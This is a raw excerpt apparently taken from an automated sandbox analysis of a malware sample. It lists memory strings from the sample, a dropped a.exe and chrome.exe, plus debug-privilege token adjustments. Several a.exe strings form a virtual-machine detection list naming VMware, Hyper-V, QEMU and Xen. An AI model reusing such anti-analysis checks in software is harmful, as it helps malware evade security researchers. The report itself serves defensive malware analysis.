                      Source: chrome.exe, 0000000C.00000002.1510374519.0000021F24EAC000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000C.00000003.1472885600.0000021F24EAC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VHyper-V Dynamic Memory Integration Service
                      Source: chrome.exe, 0000000C.00000002.1527875839.00003D3C01214000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: USB device added: path=\\?\usb#vid_0e0f&pid_0003#5&2dda038&0&5#{a5dcbf10-6530-11d2-901f-00c04fb951ed} vendor=3599 "VMware", product=3 "VMware Virtual USB Mouse", serial="", driver="usbccgp", guid=e85043da-2b6e-44fe-813c-c7ea66951e86
                      Source: chrome.exe, 0000000C.00000002.1502444360.0000021F22401000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V cdplirjdmpdrttm Bus
                      Source: chrome.exe, 0000000C.00000003.1419243436.0000021F40DDA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 4796Virtual Processors4798Monitored Notifications4800Modern Standby Entries4802Platform Idle Transitions4804HypervisorStartupCost4906Hyper-V Hypervisor Root Partition4908Virtual Processors4910Virtual TLB Pages4912Address Spaces4914Deposited Pages4916GPA w
                      Source: a.exe, 0000000B.00000002.1806616059.0000000004432000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: *|vmware horizon client*|vm ware8394
                      Source: chrome.exe, 0000000C.00000002.1510888505.0000021F24EDA000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000C.00000003.1471920601.0000021F24ED5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V VM Vid PartitionH$
                      Source: chrome.exe, 0000000C.00000003.1472668469.0000021F40E5E000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000C.00000003.1472235393.0000021F40E4B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: `BL{8082C5E6-4C27-48ec-A809-B8E1122E8F97}.contact shell extension handlerew Handlerst Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814Hardware Interrupts/sec4816Context Switches/sec4818Inter-Processor Interrupts/sec4820Scheduler Interrupts/sec4822Timer Interrupts/sec4824Inter-Processor Interrupts Sent/sec4826Processor Halts/sec4828
                      Source: chrome.exe, 0000000C.00000002.1510888505.0000021F24EDA000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000C.00000003.1471920601.0000021F24ED5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: JHyper-V Hypervisor Logical Processor
                      Source: chrome.exe, 0000000C.00000003.1413822397.0000021F40DD5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ess Packets: RS-Secondary3244In - Teredo Server Error Packets: Total3246In - Teredo Server Error Packets: Header Error3248In - Teredo Server Error Packets: Source Error3250In - Teredo Server Error Packets: Destination Error3252In - Teredo Server Error Packets: Authentication Error3254Out - Teredo Server: RA-Primary3256Out - Teredo Server: RA-Secondary 3258In - Teredo Server Total Packets: Success + Error / sec3206Teredo Client3208In - Teredo Router Advertisement3210In - Teredo Bubble3212In - Teredo Data3214In - Teredo Invalid3216Out - Teredo Router Solicitation3218Out - Teredo Bubble3220Out - Teredo Data3222In - Teredo Data User Mode3224In - Teredo Data Kernel Mode3226Out - Teredo Data User Mode3228Out - Teredo Data Kernel Mode6468Hyper-V Dynamic Memory Integration Service6470Maximum Memory, Mbytes1848Bluetooth Radio1850Classic ACL bytes written/sec1852LE ACL bytes written/sec1854SCO bytes written/sec1856Classic ACL bytes read/sec1858LE ACL bytes read/sec1860SCO bytes read/sec1862Classic ACL Connections1864LE ACL Connections1866SCO Connections1868Sideband SCO Connections1870ACL flush events/sec1872LE ACL write credits1874Classic ACL write credits1876LE Scan Duty Cycle (%) - Uncoded 1M Phy1878LE Scan Window - Uncoded 1M Phy1880LE Scan Interval - Uncoded 1M Phy1882Page Scan Duty Cycle (%)1884Page Scan Window1886Page Scan Interval1888Inquiry Scan Duty Cycle (%)1890Inquiry Scan Window1892Inquiry Scan Interval1894LE Scan Duty Cycle (%) - Coded Phy1896LE Scan Window - Coded Phy1898LE Scan Interval - Coded Phy1900Bluetooth Device1902Classic ACL bytes written/sec1904LE ACL bytes written/sec1906SCO bytes written/sec1908Classic ACL bytes read/sec1910LE ACL bytes read/sec1912SCO bytes read/sec3814ServiceModelService 4.0.0.03816Calls^^!
                      Source: a.exe, 0000000B.00000002.1787672422.00000000031E1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 0VMware|VIRTUAL|A M I|Xen4win32_process.handle='{0}'
                      Source: chrome.exe, 0000000C.00000002.1514580834.0000021F40DA0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: NXTbeVMWare
                      Source: chrome.exe, 0000000C.00000003.1419806386.0000021F40E62000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000C.00000003.1419108757.0000021F40E38000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000C.00000003.1412845996.0000021F40E52000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: kflowServiceHost 4.0.0.06244Workflows Created6246Workflows Created Per Second6248Workflows Executing6250Workflows Completed6252Workflows Completed Per Second6254Workflows Aborted6256Workflows Aborted Per Second6258Workflows In Memory6260Workflows Persisted6262Workflows Persisted Per Second6264Workflows Terminated6266Workflows Terminated Per Second6268Workflows Loaded6270Workflows Loaded Per Second6272Workflows Unloaded6274Workflows Unloaded Per Second6276Workflows Suspended6278Workflows Suspended Per Second6280Workflows Idle Per Second6282Average Workflow Load Time6284Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814Hardware Interrupts/sec4816Context Switches/sec4818Inter-Processor Interrupts/sec4820Scheduler Interrupts/sec4822Timer Interrupts/sec4824Inter-Processor Interrupts Sent/sec4826Processor Halts/sec4828Mon
                      Source: a.exe, 0000000B.00000002.1787672422.00000000031E1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: model0Microsoft|VMWare|Virtual
                      Source: a.exe, 0000000B.00000002.1806616059.0000000004432000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: *|vmware workstation 12 player*|vmpl5459
                      Source: a.exe, 0000000B.00000002.1806616059.0000000004432000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: *|hyper-v manager*|vm4595
                      Source: a.exe, 0000000B.00000002.1806616059.0000000004432000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: *|*|vmware6886
                      Source: a.exe, 0000000B.00000002.1787672422.00000000033FC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: rKD:\sources\replacementmanifests\microsoft-hyper-v-migration-replacement.man
                      Source: a.exe, 0000000B.00000002.1806616059.0000000004432000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: *|vmware horizon client*|vmare7220
                      Source: chrome.exe, 0000000C.00000003.1413046805.0000021F40DEF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: kflowServiceHost 4.0.0.06244Workflows Created6246Workflows Created Per Second6248Workflows Executing6250Workflows Completed6252Workflows Completed Per Second6254Workflows Aborted6256Workflows Aborted Per Second6258Workflows In Memory6260Workflows Persisted6262Workflows Persisted Per Second6264Workflows Terminated6266Workflows Terminated Per Second6268Workflows Loaded6270Workflows Loaded Per Second6272Workflows Unloaded6274Workflows Unloaded Per Second6276Workflows Suspended6278Workflows Suspended Per Second6280Workflows Idle Per Second6282Average Workflow Load Time6284Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814Hardware Interrupts/sec4816Context Switches/sec4818Inter-Processor Interrupts/sec4820Scheduler Interrupts/sec4822Timer Interrupts/sec4824Inter-Processor Interrupts Sent/sec4826Processor Halts/sec4828Monitor Transition Cost4830Context Switch Time4832C1 Transitions/sec4834% C1 Time4836C2 Transitions/sec4838% C2 Time4840C3 Transitions/sec4842% C3 Time4844Frequency4846% of Max Frequency4848Parking Status4850Processor State Flags4852Root Vp Index4854Idle Se
                      Source: chrome.exe, 0000000C.00000002.1510888505.0000021F24EDA000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000C.00000003.1471920601.0000021F24ED5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Hypervisor2:W
                      Source: SecuriteInfo.com.FileRepMalware.23820.12149.exe, 00000000.00000002.1345858896.0000000005A1F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\)@
                      Source: chrome.exe, 0000000C.00000002.1502444360.0000021F22330000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V VM Vid Partitionll
                      Source: a.exe, 0000000B.00000002.1787672422.00000000033FC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: rSD:\sources\replacementmanifests\microsoft-hyper-v-drivers-migration-replacement.man
                      Source: a.exe, 0000000B.00000002.1806616059.0000000004432000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: *|vmware workstation 15 player*|vmplayer6438
                      Source: chrome.exe, 0000000C.00000002.1527875839.00003D3C01214000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: VMware Virtual USB Mouse
                      Source: chrome.exe, 0000000C.00000002.1502444360.0000021F223CE000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.1510888505.0000021F24EDA000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000C.00000003.1471920601.0000021F24ED5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Hypervisor Root Virtual Processor
                      Source: chrome.exe, 0000000C.00000002.1510888505.0000021F24EDA000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000C.00000003.1471920601.0000021F24ED5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: sWDHyper-V Hypervisor Root Partition~
                      Source: chrome.exe, 0000000C.00000003.1472885600.0000021F24DA4000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.1510374519.0000021F24DA4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: THyper-V Hypervisor Root Virtual Processor
                      Source: chrome.exe, 0000000C.00000002.1510888505.0000021F24EDA000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000C.00000003.1471920601.0000021F24ED5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: THyper-V Hypervisor Root Virtual Processores
                      Source: chrome.exe, 0000000C.00000002.1510888505.0000021F24EDA000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000C.00000003.1471920601.0000021F24ED5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VHyper-V Dynamic Memory Integration Services
                      Source: a.exe, 0000000B.00000002.1806616059.0000000004432000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: *|*|qemu10642
                      Source: chrome.exe, 0000000C.00000002.1502444360.0000021F2239B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: DHyper-V Hypervisor Root Partition
                      Source: chrome.exe, 0000000C.00000002.1510888505.0000021F24EDA000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000C.00000003.1471920601.0000021F24ED5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: &Hyper-V Hypervisor
                      Source: a.exe, 0000000B.00000002.1787672422.00000000033FC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: r2microsoft-hyper-v-client-migration-replacement.man
                      Source: chrome.exe, 0000000C.00000003.1421070490.0000021F40E47000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000C.00000003.1419108757.0000021F40E38000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 4938512G device pages4940Attached Devices4942Device Interrupt Mappings4944I/O TLB Flushes/sec4946I/O TLB Flush Cost4948Device Interrupt Errors4950Device DMA Errors4952Device Interrupt Throttle Events4954Skipped Timer Ticks4956Partition Id4958Nested TLB Size4960Recommended Nested TLB Size4962Nested TLB Free List Size4964Nested TLB Trimmed Pages/sec4966Pages Shattered/sec4968Pages Recombined/sec4970I/O TLB Flushes Base4972Hyper-V Hypervisor Root Virtual Processor4974Total Run Time4976Hypervisor Run Time4
                      Source: chrome.exe, 0000000C.00000003.1421070490.0000021F40E47000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000C.00000003.1419108757.0000021F40E38000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 4792Partitions4794Total Pages4796Virtual Processors4798Monitored Notifications4800Modern Standby Entries4802Platform Idle Transitions4804HypervisorStartupCost4906Hyper-V Hypervisor Root Partition4908Virtual Processors4910Virtual TLB Pages4912Address Spaces4914Deposited Pages4916GPA Pages4918GPA Space Modifications/sec4920Virtual TLB Flush Entires/sec4922Recommended Virtual TLB Size49244K GPA pages49262M GPA pages49281G GPA pages4930512G GPA pages49324K device pages49342M device pages49361G device p
                      Source: chrome.exe, 0000000C.00000002.1510888505.0000021F24EDA000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000C.00000003.1471920601.0000021F24ED5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Dynamic Memory Integration Service>++
                      Source: chrome.exe, 0000000C.00000003.1472668469.0000021F40E5E000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000C.00000003.1472235393.0000021F40E4B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: `XL{b9815375-5d7f-4ce2-9245-c9d4da436930}Microsoft Windows Mail Html Preview Handleriate L1 Data Cache Flushes/sec4880Hypervisor Microarchitectural Buffer Flushes/sec4882Counter Refresh Sequence Number4884Counter Refresh Reference Time4886Idle Accumulation Snapshot4888Active Tsc Count Snapshot4890HWP Request MSR Context Switches/sec4892Guest Run Time4894Idle Time4896% Total Run Time4898% Hypervisor Run Time4900% Guest Run Time4902% Idle Time4904Total Interrupts/sec4788Hyper-V Hypervisor4790Logical Processh
                      Source: chrome.exe, 0000000C.00000002.1510888505.0000021F24EDA000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000C.00000003.1471920601.0000021F24ED5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Virtual Machine Bus Pipesac
                      Source: a.exe, 0000000B.00000002.1806616059.0000000004432000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: *|hyper-v manager*|hyperv4178
                      Source: chrome.exe, 0000000C.00000002.1502444360.0000021F2239B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: JHyper-V Hypervisor Logical ProcessorOu
                      Source: chrome.exe, 0000000C.00000002.1510374519.0000021F24E96000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000C.00000003.1472885600.0000021F24E96000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: &Hyper-V Hypervisor
                      Source: chrome.exe, 0000000C.00000002.1514580834.0000021F40DDA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \REGISTRY\USER\S-1-5-21-2246122658-3693405117-2476756634-1002_Classes\CLSID\{7EFA68C6-086B-43e1-A2D2-55A113531240}\InProcServer32artupCost4906Hyper-V Hypervisor Root Partition4908Virtual Processors4910Virtual TLB Pages4912Address Spaces4914Deposited Pages4916GPA w
                      Source: chrome.exe, 0000000C.00000002.1510888505.0000021F24EDA000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000C.00000003.1471920601.0000021F24ED5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: AlDHyper-V Virtual Machine Bus Pipesui5
                      Source: a.exe, 0000000B.00000002.1806616059.0000000004432000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: *|hyper-v manager*|virtual5441
                      Source: SecuriteInfo.com.FileRepMalware.23820.12149.exe, 00000000.00000002.1345858896.0000000005A70000.00000004.00000020.00020000.00000000.sdmp, a.exe, 0000000B.00000002.1784934154.0000000001302000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: chrome.exe, 0000000C.00000002.1514580834.0000021F40DDA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \REGISTRY\USER\S-1-5-21-2246122658-3693405117-2476756634-1002_Classes\CLSID\{0bf754aa-c967-445c-ab3d-d8fda9bae7ef}\InProcServer32Base4972Hyper-V Hypervisor Root Virtual Processor4974Total Run Time4976Hypervisor Run Time4978Remote Node Run Time4980Normalized Run Tim
                      Source: chrome.exe, 0000000C.00000002.1510888505.0000021F24EDA000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000C.00000003.1471920601.0000021F24ED5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Virtual Machine Bus Pipess
                      Source: chrome.exe, 0000000C.00000003.1418642652.0000021F40E29000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 6242WorkflowServiceHost 4.0.0.06244Workflows Created6246Workflows Created Per Second6248Workflows Executing6250Workflows Completed6252Workflows Completed Per Second6254Workflows Aborted6256Workflows Aborted Per Second6258Workflows In Memory6260Workflows Persisted6262Workflows Persisted Per Second6264Workflows Terminated6266Workflows Terminated Per Second6268Workflows Loaded6270Workflows Loaded Per Second6272Workflows Unloaded6274Workflows Unloaded Per Second6276Workflows Suspended6278Workflows Suspended Per Second6280Workflows Idle Per Second6282Average Workflow Load Time6284Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814Hardware Interrupts/sec4816Context Switches/sec4818Inter-Processor Interrupts/sec4820Scheduler Interrupts/sec4822Timer Interrupts/sec4824Inter-Processor Interrupts Sent/sec4826Processor Halts/sec4828Monitor Transition Cost4830Context Switch Time4832C1 Transitions/sec4834% C1 Time4836C2 Transitions/sec4838% C2 Time4840C3 Transitions/sec4842% C3 Time4844Frequency4846% of Max Frequency4848Parking Status4850Processor State Flags4852Root Vp Index4854Idle Sequence Number4856Global TSC Count4858Active TSC Count4860Idle Accumulation4862Reference Cycle Count 04864Actual Cycle Count 04866Reference Cycle Count 14868Actual Cycle Count 14870Proximity Domain Id4872Posted Interrupt Notifications/sec4874Hypervisor Branch Predictor Flushes/sec4876Hypervisor L1 Data Cache Flushes/sec4878Hypervisor Immediate L1 Data Cache Flushes/sec4880Hypervisor Microarchitectural Buffer Flushes/sec4882Counter Refresh Sequence Number4884Counter Refresh Reference Time4886Idle Accumulation Snapshot4888Active Tsc Count Snapshot the
                      Source: chrome.exe, 0000000C.00000003.1412915107.0000021F40E38000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: kflowServiceHost 4.0.0.06244Workflows Created6246Workflows Created Per Second6248Workflows Executing6250Workflows Completed6252Workflows Completed Per Second6254Workflows Aborted6256Workflows Aborted Per Second6258Workflows In Memory6260Workflows Persisted6262Workflows Persisted Per Second6264Workflows Terminated6266Workflows Terminated Per Second6268Workflows Loaded6270Workflows Loaded Per Second6272Workflows Unloaded6274Workflows Unloaded Per Second6276Workflows Suspended6278Workflows Suspended Per Second6280Workflows Idle Per Second6282Average Workflow Load Time6284Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervis
                      Source: chrome.exe, 0000000C.00000002.1510374519.0000021F24D32000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000C.00000003.1472885600.0000021F24D36000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V cdplirjdmpdrttm Bus Pipesy
                      Source: a.exe, 0000000B.00000002.1806616059.0000000004432000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: *|vmware vsphere client*|vspe6388
                      Source: chrome.exe, 0000000C.00000003.1419243436.0000021F40DDA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: sted TLB Free List Size4964Nested TLB Trimmed Pages/sec4966Pages Shattered/sec4968Pages Recombined/sec4970I/O TLB Flushes Base4972Hyper-V Hypervisor Root Virtual Processor4974Total Run Time4976Hypervisor Run Time4978Remote Node Run Time4980Normalized Run Tim
                      Source: a.exe, 0000000B.00000002.1806616059.0000000004432000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: *|vmware horizon client*|vdi3894
                      Source: a.exe, 0000000B.00000002.1806616059.0000000004432000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: *|hyper-v manager*|hyper v4919
                      Source: chrome.exe, 0000000C.00000003.1472668469.0000021F40E5E000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000C.00000003.1472235393.0000021F40E4B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: L{09A47860-11B0-4DA5-AFA5-26D86198A780}EPPosoft Windows Mail Html Preview Handlerndows Desktop SearchB Flush Cost4948Device Interrupt Errors4950Device DMA Errors4952Device Interrupt Throttle Events4954Skipped Timer Ticks4956Partition Id4958Nested TLB Size4960Recommended Nested TLB Size4962Nested TLB Free List Size4964Nested TLB Trimmed Pages/sec4966Pages Shattered/sec4968Pages Recombined/sec4970I/O TLB Flushes Base4972Hyper-V Hypervisor Root Virtual Processor4974Total Run Time4976Hypervisor Run Time4
                      Source: chrome.exe, 0000000C.00000003.1413822397.0000021F40DD5000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000C.00000003.1413518447.0000021F40DB3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: kflowServiceHost 4.0.0.06244Workflows Created6246Workflows Created Per Second6248Workflows Executing6250Workflows Completed6252Workflows Completed Per Second6254Workflows Aborted6256Workflows Aborted Per Second6258Workflows In Memory6260Workflows Persisted6262Workflows Persisted Per Second6264Workflows Terminated6266Workflows Terminated Per Second6268Workflows Loaded6270Workflows Loaded Per Second6272Workflows Unloaded6274Workflows Unloaded Per Second6276Workflows Suspended6278Workflows Suspended Per Second6280Workflows Idle Per Second6282Average Workflow Load Time6284Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814Hardware Interrupts/sec4816Context Switches/sec4818Inter-Processor Interrupts/sec4820Scheduler Interrupts/sec4822Timer Interrupts/sec4824Inter-Processor Interrupts Sent/sec4826Processor Halts/sec4828Monitor Transition Cost4830Context Switch Time4832C1 Transitions/sec4834% C1 Time4836C2 Transitions/sec4838% C2 Time4840C3 Transitions/sec4842% C3 Time4844Frequency4846% of Max Frequency4848Parking Status4850Processor State Flags4852Root Vp Index4854Idle Sequence Number4856Global TSC Count4858Active TSC Count4860Idle Accumulation4862Reference Cycle Count 04864Actual Cycle Count 04866Reference Cycle Count 14868Actual Cycle Count 14870Proximity Domain Id4872Posted Interrupt Notifications/sec4874Hypervisor Branch Predictor Flushes/sec4876Hypervisor L1 Data Cache Flushes/sec4878Hypervisor Immediate L1 Data Cache Flushes/sec4880Hypervisor Microarchitectural Buffer Flushes/sec4882Counter Refresh Sequence Number4884Counter Refresh Reference Time4886Idle Accumulation Snapshot4888Active Tsc Count
                      Source: a.exe, 0000000B.00000002.1806616059.0000000004432000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: *|vmware horizon client*|view5503
                      Source: chrome.exe, 0000000C.00000003.1419625359.0000021F40E2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: kflowServiceHost 4.0.0.06244Workflows Created6246Workflows Created Per Second6248Workflows Executing6250Workflows Completed6252Workflows Completed Per Second6254Workflows Aborted6256Workflows Aborted Per Second6258Workflows In Memory6260Workflows Persisted6262Workflows Persisted Per Second6264Workflows Terminated6266Workflows Terminated Per Second6268Workflows Loaded6270Workflows Loaded Per Second6272Workflows Unloaded6274Workflows Unloaded Per Second6276Workflows Suspended6278Workflows Suspended Per Second6280Workflows Idle Per Second6282Average Workflow Load Time6284Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814Hardware Interrupts/sec4816Context Switches/sec4818Inter-Processor Interrupts/sec4820Scheduler Interrupts/sec4822Timer Interrupts/sec4824Inter-Processor Interrupts Sent/sec4826Processor Halts/sec4828Monitor Transition Cost4830Context Switch Time4832C1 Transitions/sec4834% C1 Time4836C2 Transitions/sec4838% C2 Time4840C3 Transitions/sec4842% C3 Time4844Frequency4846% of Max Frequency4848Parking Status4850Processor State Flags4852Root Vp Index4854Idle Sequence Number4856Global TSC Count4858Active TSC Count4860Idle Accumulation4862Reference Cycle Count 04864Actual Cycle Count 04866Reference Cycle Count 14868Actual Cycle Count 14870Proximity Domain Id4872Posted Interrupt Notifications/sec4874Hypervisor Branch Predictor Flushes/sec4876Hypervisor L1 Data Cache Flushes/sec4878Hypervisor Immediate L1 Data Cache Flushes/sec4880Hypervisor Microarchitectural Buffer Flushes/sec4882Counter Refresh Sequence Number4884Counter Refresh Reference Time4886Idle Accumulation Snapshot4888Active Tsc Count Snapshot theHHf p
                      Source: chrome.exe, 0000000C.00000003.1419625359.0000021F40E2A000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000C.00000003.1412962829.0000021F40E1E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: kflowServiceHost 4.0.0.06244Workflows Created6246Workflows Created Per Second6248Workflows Executing6250Workflows Completed6252Workflows Completed Per Second6254Workflows Aborted6256Workflows Aborted Per Second6258Workflows In Memory6260Workflows Persisted6262Workflows Persisted Per Second6264Workflows Terminated6266Workflows Terminated Per Second6268Workflows Loaded6270Workflows Loaded Per Second6272Workflows Unloaded6274Workflows Unloaded Per Second6276Workflows Suspended6278Workflows Suspended Per Second6280Workflows Idle Per Second6282Average Workflow Load Time6284Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814Hardware Interrupts/sec4816Context Switches/sec4818Inter-Processor Interrupts/sec4820Scheduler Interrupts/sec4822Timer Interrupts/sec4824Inter-Processor Interrupts Sent/sec4826Processor Halts/sec4828Monitor Transition Cost4830Context Switch Time4832C1 Transitions/sec4834% C1 Time4836C2 Transitions/sec4838% C2 Time4840C3 Transitions/sec4842% C3 Time4844Frequency4846% of Max Frequency4848Parking Status4850Processor State Flags4852Root Vp Index4854Idle Sequence Number4856Global TSC Count4858Active TSC Count4860Idle Accumulation4862Reference Cycle Count 04864Actual Cycle Count 04866Reference Cycle Count 14868Actual Cycle Count 14870Proximity Domain Id4872Posted Inte
                      Source: chrome.exe, 0000000C.00000003.1419243436.0000021F40DDA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Snapshot4890HWP Request MSR Context Switches/sec4892Guest Run Time4894Idle Time4896% Total Run Time4898% Hypervisor Run Time4900% Guest Run Time4902% Idle Time4904Total Interrupts/sec4788Hyper-V Hypervisor4790Logical Processors4792Partitions4794Total P
                      Source: chrome.exe, 0000000C.00000002.1502444360.0000021F223CE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V Hypervisor Logical Processorc.sys
                      Source: chrome.exe, 0000000C.00000002.1510888505.0000021F24EDA000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000C.00000003.1471920601.0000021F24ED5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 2Hyper-V VM Vid Partition.dll
                      Source: a.exe, 0000000B.00000002.1787672422.00000000033FC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: r+microsoft-hyper-v-migration-replacement.man
                      Source: chrome.exe, 0000000C.00000003.1472668469.0000021F40E5E000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000C.00000003.1472235393.0000021F40E4B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: `2L{289AF617-1CC3-42A6-926C-E6A863F0E3BA}DLNA Namespace Extensionbnail Handler800Modern Standby Entries4802Platform Idle Transitions4804HypervisorStartupCost4906Hyper-V Hypervisor Root Partition4908Virtual Processors4910Virtual TLB Pages4912Address Spaces4914Deposited Pages4916GPA Pages4918GPA Space Modifications/sec4920Virtual TLB Flush Entires/sec4922Recommended Virtual TLB Size49244K GPA pages49262M GPA pages49281G GPA pages4930512G GPA pages49324K device pages49342M device pages49361G device p
                      Source: a.exe, 0000000B.00000002.1806616059.0000000004432000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: *|vmware vsphere client*|vcenter5038
                      Source: chrome.exe, 0000000C.00000002.1510888505.0000021F24EDA000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000C.00000003.1471920601.0000021F24ED5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: X2Hyper-V VM Vid Partitiondll3.
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exe	Process information queried: ProcessInformation
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exe	Process token adjusted: Debug
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
                      Source: C:\Users\user\AppData\Roaming\a.exe	Process token adjusted: Debug
